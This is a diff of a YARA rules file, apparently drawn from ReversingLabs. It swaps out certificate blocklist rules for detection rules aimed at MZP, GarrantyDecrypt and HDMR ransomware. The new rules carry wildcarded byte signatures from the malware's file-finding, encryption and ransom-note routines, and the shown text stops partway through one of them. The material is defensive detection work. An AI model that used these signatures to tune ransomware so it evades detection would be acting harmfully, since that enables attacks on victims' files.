"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5a89fec015e56ddddaed75be91a87288dcd27841937d26e3416187913c4f0b85" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.MZP.yara#L1-L147" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "724ae1033bfb8ff494b30e6b3333e6c848375f1b001b75e71c9444c9f9f31251" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "MZP" + tc_detection_factor = 5 importance = 25 + strings: + $show_ransom_note_p1 = { + 55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 53 56 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? + ?? 88 55 ?? 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 8B C3 E8 ?? ?? ?? + ?? 89 1D ?? ?? ?? ?? 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 33 C0 + 89 46 ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? + ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? + 6A ?? 6A ?? 8D 45 ?? 50 33 C9 B2 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8D 86 ?? + ?? ?? ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? + C6 86 ?? ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 33 C0 89 86 ?? ?? + ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? + ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? + ?? ?? C6 86 ?? ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 + ?? ?? ?? ?? B2 ?? 8B C6 E8 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? A1 ?? ?? + ?? ?? 8B 00 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 33 D2 8B C6 E8 + } + $show_ransom_note_p2 = { + C6 86 ?? ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? + ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? + ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? B2 + ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? C6 46 ?? ?? C6 46 ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? C6 46 + ?? ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + F0 89 73 ?? BA ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 + 8D 46 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 8B C6 C6 + 40 ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 + ?? 8B C6 C6 40 ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 89 43 ?? 8B 73 ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 46 ?? 33 D2 E8 ?? ?? ?? + ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? 8D 46 ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 43 ?? B2 ?? A1 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 89 43 ?? 8B 73 ?? 8D 46 ?? 33 D2 E8 ?? ?? ?? ?? 8D 46 ?? BA ?? ?? ?? + ?? E8 + } + $search_config_file = { + 8B C0 53 56 8B F0 8A 9E ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 75 ?? + 8B 46 ?? 8B 48 ?? A1 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 33 D2 8B + 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? 83 BE ?? ?? ?? ?? ?? 74 ?? 8B 96 ?? ?? ?? ?? B8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? + EB ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 88 9E ?? ?? ?? ?? 8A 96 ?? ?? + ?? ?? 8B C6 E8 ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 74 ?? 8B 46 ?? 8B 8E ?? ?? ?? ?? 8B + 96 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8B 46 ?? E8 ?? ?? ?? ?? 8B 46 ?? 89 + 70 ?? 5E 5B C3 + } + $track_mouse_event_for_entropy = { + 53 56 83 C4 ?? 8B F0 8B 42 ?? 05 ?? ?? ?? ?? 83 E8 ?? 72 ?? 2D ?? ?? ?? ?? 0F 84 ?? + ?? ?? ?? E9 ?? ?? ?? ?? 8A 86 ?? ?? ?? ?? 88 44 24 ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? + 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? 8B D8 EB ?? 54 E8 ?? ?? ?? ?? 8D 4C 24 ?? + 8B D4 8B C6 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8D 54 24 ?? + 8B C6 E8 ?? ?? ?? ?? 8D 54 24 ?? 8B C4 E8 ?? ?? ?? ?? 8B D8 3A 5C 24 ?? 0F 84 ?? ?? + ?? ?? 8B C6 E8 ?? ?? ?? ?? 84 DB 74 ?? C6 86 ?? ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? + 74 ?? 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? 8B 46 ?? 89 44 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? EB + ?? C6 86 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 46 ?? 89 + 44 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? 8B D6 8B 86 ?? ?? + ?? ?? FF 96 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? EB ?? 80 BE ?? ?? ?? ?? ?? 74 ?? C6 86 + ?? ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? + ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 5E 5B C3 + } + $find_files_p1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B FA + 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? + ?? B9 ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 43 ?? 8D 85 ?? ?? ?? ?? + 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 8A 08 41 E8 + ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? + 0F 84 ?? ?? ?? ?? 80 7B ?? ?? 76 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D7 8B C3 E8 ?? ?? ?? ?? 80 7B ?? ?? 0F 85 ?? + ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? + ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 43 ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 53 ?? E8 ?? ?? ?? ?? 84 C0 74 ?? FF 43 + } + $find_files_p2 = { + 80 7B ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D7 8B C3 E8 ?? ?? ?? ?? EB ?? 80 7B ?? ?? 74 ?? 8D + 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 43 ?? E8 ?? ?? ?? ?? EB ?? + 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? + 8D 43 ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + $encrypt_files = { + 8B C0 33 D2 89 50 ?? 89 50 ?? 52 8D 50 ?? 52 FF 70 ?? FF 70 ?? FF 30 E8 ?? ?? ?? ?? + 85 C0 74 ?? 33 C0 C3 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? C3 33 C0 C3 51 8B 50 ?? 85 D2 7E + ?? 33 C9 89 48 ?? 51 8D 4C 24 ?? 51 52 FF 70 ?? FF 30 E8 ?? ?? ?? ?? 85 C0 74 ?? 33 + C0 59 C3 E8 ?? ?? ?? ?? EB ?? FF 30 C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 75 ?? C3 + E8 ?? ?? ?? ?? C3 56 8B F0 33 C0 89 46 ?? 89 46 ?? 8B 46 ?? 2D ?? ?? ?? ?? 74 ?? 48 + 74 ?? 48 74 ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 46 ?? + ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? + BA ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? + ?? ?? ?? 80 7E ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 51 6A ?? 52 50 8D 46 ?? + 50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 06 81 7E ?? ?? ?? ?? ?? 0F 85 ?? ?? + ?? ?? FF 4E ?? 6A ?? FF 36 E8 ?? ?? ?? ?? 40 0F 84 ?? ?? ?? ?? 2D ?? ?? ?? ?? 73 ?? + 33 C0 6A ?? 6A ?? 50 FF 36 E8 ?? ?? ?? ?? 40 0F 84 ?? ?? ?? ?? 6A ?? 8B D4 6A ?? 52 + 68 ?? ?? ?? ?? 8D 96 ?? ?? ?? ?? 52 FF 36 E8 ?? ?? ?? ?? 5A 48 0F 85 ?? ?? ?? ?? 33 + C0 3B C2 73 ?? 80 BC 06 ?? ?? ?? ?? ?? 74 ?? 40 EB ?? 6A ?? 6A ?? 2B C2 50 FF 36 E8 + ?? ?? ?? ?? 40 74 ?? FF 36 E8 ?? ?? ?? ?? 48 75 ?? EB ?? C7 46 ?? ?? ?? ?? ?? 81 7E + ?? ?? ?? ?? ?? 74 ?? 6A ?? EB ?? 6A ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 06 81 7E ?? + ?? ?? ?? ?? 74 ?? FF 36 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 F8 ?? 75 ?? C7 46 ?? ?? ?? ?? + ?? 33 C0 5E C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Programavimo paslaugos, MB" and pe.signatures[i].serial=="29:12:8a:56:e7:b3:bf:b2:30:74:25:91:ac:8b:47:18" and 1590900909<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($search_config_file) and ( all of ($find_files_p*)) and ($track_mouse_event_for_entropy) and ($encrypt_files) and ( all of ($show_ransom_note_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_7Bfbfdfef43608730Ee14779Ee3Ee2Cb : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Garrantydecrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects GarrantyDecrypt ransomware." author = "ReversingLabs" - id = "fdc2f6a0-8fae-537e-812f-b0c292f76b1e" - date = "2023-11-08" - modified = "2023-11-08" + id = "0aa05f06-1773-5ce8-892d-04468f5deccc" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4124-L4140" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f8f233b78e9d3558b0cd7978e3c5fa32645a3bb706c6fdec7f1e4195cf513f10" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.GarrantyDecrypt.yara#L1-L79" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7194c1e0e15a89f2c691a7d586b9db68295cc52a5f042d0f7eb558c326430444" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "GarrantyDecrypt" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 8D 45 ?? 50 89 5D ?? FF D6 85 C0 75 + ?? 68 ?? ?? ?? ?? 6A ?? 53 53 8D 45 ?? 50 FF D6 85 C0 74 ?? 8B 45 ?? A3 ?? ?? ?? ?? + 3B C3 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 3B F3 0F 84 ?? ?? ?? ?? 8B 7E ?? 8B 46 + ?? 33 C9 3B FB 76 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 29 45 ?? 8B 55 ?? 8D 84 0D ?? ?? ?? + ?? 8A 14 02 41 88 10 3B CF 72 ?? 68 ?? ?? ?? ?? 53 53 FF 76 ?? FF 36 FF 35 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 3B FB 74 ?? 8B 46 ?? 68 ?? ?? ?? ?? 89 45 + ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 53 6A ?? 53 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B + 45 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 36 E8 + ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 53 FF + 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF 15 + } + $encrypt_files_p2 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? 50 6A ?? 5F 57 FF 35 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 58 E8 ?? ?? ?? ?? 8B C8 33 DB 89 4D ?? 3B + CB 0F 84 ?? ?? ?? ?? 8D 45 ?? 89 7D ?? 8B F1 2B C1 8A 14 30 88 16 46 4F 75 ?? 6A ?? + 8D 45 ?? 50 51 53 6A ?? 53 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 53 68 ?? ?? + ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? + ?? ?? ?? 89 5D ?? 89 5D ?? 8B 3D ?? ?? ?? ?? 56 FF D7 8D 04 46 83 E8 ?? 66 83 38 ?? + 75 ?? 8B 4D ?? FF B1 ?? ?? ?? ?? 2B C6 83 C0 ?? D1 F8 8D 04 46 50 FF 15 ?? ?? ?? ?? + 3B C3 74 ?? 50 FF D7 8B 4D ?? FF B1 ?? ?? ?? ?? 89 45 ?? FF D7 39 45 ?? 74 ?? 83 45 + ?? ?? 83 7D ?? ?? 72 ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 3D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 45 ?? 3B C3 0F 84 ?? ?? ?? ?? 53 8D 45 ?? 50 68 + ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 33 C0 89 5D ?? 3B + C3 72 ?? 77 ?? 39 5D ?? 76 ?? 8B 45 ?? 8B C8 81 E1 ?? ?? ?? ?? 79 ?? 49 83 C9 ?? 41 + 89 4D ?? 75 ?? 99 83 E2 ?? 03 C2 C1 F8 ?? 99 52 50 8D 85 ?? ?? ?? ?? 50 8D 45 ?? E8 + ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 8B 55 ?? 8B 45 ?? 8A 8C 0D ?? ?? ?? ?? 30 0C 10 FF 45 + ?? 8B 45 ?? 99 33 C9 3B D1 72 ?? 77 ?? 3B 45 ?? 72 ?? 8B 45 ?? 6A ?? F7 D8 99 53 52 + 50 FF 75 ?? FF D7 53 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF D6 39 5D ?? 74 ?? 81 + 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 6A ?? 53 53 33 C0 50 + FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF D7 53 8D 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF D6 + 53 8D 45 ?? 50 6A ?? FF 75 ?? FF 75 ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B F0 3B F3 74 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? + 59 FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3 + } + $find_files = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 89 5D ?? 85 + DB 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 53 + FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? + ?? ?? ?? BB ?? ?? ?? ?? 83 65 ?? ?? 8B 45 ?? FF B0 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 45 ?? ?? 83 7D ?? ?? 72 ?? 8D 85 ?? ?? + ?? ?? 50 FF 75 ?? 53 57 FF 75 ?? FF D6 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? FF 75 + ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? + ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 53 57 FF 75 ?? FF D6 83 + C4 ?? 33 F6 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? + ?? 8B D8 83 FB ?? 74 ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 BF ?? ?? ?? ?? 57 FF D6 50 + 57 8B 3D ?? ?? ?? ?? 53 FF D7 6A ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? FF D6 50 FF 35 ?? + ?? ?? ?? 53 FF D7 53 FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CSTech Software Inc." and pe.signatures[i].serial=="7b:fb:fd:fe:f4:36:08:73:0e:e1:47:79:ee:3e:e2:cb" and 1590537600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $find_files and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_62205361A758B00572D417Cba014F007 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_HDMR : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects HDMR ransomware." author = "ReversingLabs" - id = "85da8e0e-d791-5fed-b9ea-c681462651a6" - date = "2023-11-08" - modified = "2023-11-08" + id = "97b5020c-6cb1-5ec6-84a4-2f35eae761c2" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4142-L4158" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ebf28921c81191bcf6130baf6532122bb320cc916e38ab225f0acdcb57ea00f3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.HDMR.yara#L1-L161" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "035c6596db8dc14a663679c1f7e682b85963927cc034b01e390cc22fdee3334a" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "HDMR" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? + ?? ?? 53 56 8B 75 ?? 57 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 89 74 24 ?? + 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? + ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB + ?? 8D 49 ?? 8B 74 24 ?? F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 ?? + 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 + ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? + 8D 44 24 ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 + C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D + } + $find_files_p2 = { + 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 + ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4C 24 + ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 54 24 + ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 24 + ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 68 + ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 54 24 ?? 68 ?? ?? + ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D + 8C 24 ?? ?? ?? ?? 51 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 